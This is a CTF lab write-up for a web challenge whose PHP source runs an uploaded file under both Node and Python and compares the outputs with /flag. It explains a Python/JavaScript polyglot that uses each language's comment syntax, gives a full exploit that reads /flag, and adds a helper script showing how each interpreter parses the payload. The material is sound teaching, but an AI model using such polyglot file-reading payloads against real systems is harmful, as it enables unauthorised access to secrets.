Simple Welcome - 0x04(Lab - Script)

tags: CTF Web eductf

Challenge: https://pyscript.ctf.zoolab.org/

Source Code

<?php
    if(!isset($_FILES["file"]))
        highlight_file(__file__) && die();
    $flag = file_get_contents('/flag');
    $node = @`node {$_FILES["file"]["tmp_name"]} 2>&1`;
    $python = @`python3 {$_FILES["file"]["tmp_name"]} 2>&1`;
    if($flag === $node && $flag === $python)
        echo 'Here is your Flag: '.$flag;
    else
        echo 'Fail :(';
?>

Analysis

We must write a single script that is valid in both Python and Node, because the same uploaded file is run by both interpreters and each output must equal the flag.

Exploit - Using comment

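  1. In Python, the comment marker is # for a single line, and ''' (a triple-quoted string) is used for multiple lines
  2. In Node, the comment marker is // for a single line and /* */ for multiple lines
  3. Use the different comment definitions of the two languages to write the script. Some tips:
     a = 1 // 1;
     b = ''''''

    Both of these instructions are valid in Python: // is floor division there, and '''''' is an empty triple-quoted string. In Node, // starts a comment instead.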

  4. Whole payload
    • Python
        a = 1 // 1 ; b = '''

        console.log('Javascript code here');

        /* '''

        print('Python code here')

        # */

    • Javascript
        a = 1 // 1 ; b = '''

        console.log('Javascript code here');

        /* '''

        print('Python code here')

        # */

  • Whole exploit
      a = 1 // 1 ; b = '''
    
      const fs = require('fs');
    
      fs.readFile("/flag", 'utf8',(error, data) => {
          if (error) {
              console.error(error);
              return;
          }
          console.log(data.split('\n')[0]);
      })
    
      /* '''
    
      f = open("/flag", "r")
      print(f.read().split('\n')[0])
      # */
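
How each interpreter reads the placeholder payload from step 4, as an added example that is not part of the original write-up: `python_view` uses Python's own tokenizer, and `javascript_view` is a minimal hand-written comment stripper. Both function names are made up for this illustration.

```python
import io
import tokenize

# The placeholder payload from the write-up, reproduced verbatim.
PAYLOAD = """a = 1 // 1 ; b = '''

console.log('Javascript code here');

/* '''

print('Python code here')

# */
"""

def python_view(src):
    """Lines that carry executable Python tokens (string/comment tokens ignored)."""
    ignored = {tokenize.STRING, tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
               tokenize.INDENT, tokenize.DEDENT, tokenize.ENDMARKER}
    tokens = tokenize.generate_tokens(io.StringIO(src).readline)
    live = sorted({tok.start[0] for tok in tokens if tok.type not in ignored})
    lines = src.splitlines()
    return [lines[n - 1] for n in live]

def javascript_view(src):
    """Code left once // and /* */ comments are removed (minimal scanner, no regex literals)."""
    out, i, quote = [], 0, None
    while i < len(src):
        ch, two = src[i], src[i:i + 2]
        if quote is None and two == "//":        # line comment: skip to end of line
            nl = src.find("\n", i)
            i = len(src) if nl < 0 else nl
            continue
        if quote is None and two == "/*":        # block comment: skip past closing */
            end = src.find("*/", i + 2)
            i = len(src) if end < 0 else end + 2
            continue
        if quote and ch == "\\":                 # escaped character inside a string
            out.append(two)
            i += 2
            continue
        if quote is None and ch in "'\"`":
            quote = ch
        elif ch == quote:
            quote = None
        out.append(ch)
        i += 1
    return [ln.strip() for ln in "".join(out).splitlines() if ln.strip()]
```

Line 1 is live in both languages, but Python reads up to the opening `'''` while Node stops at `//`; after that, each interpreter executes only its own statement.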
    

Reference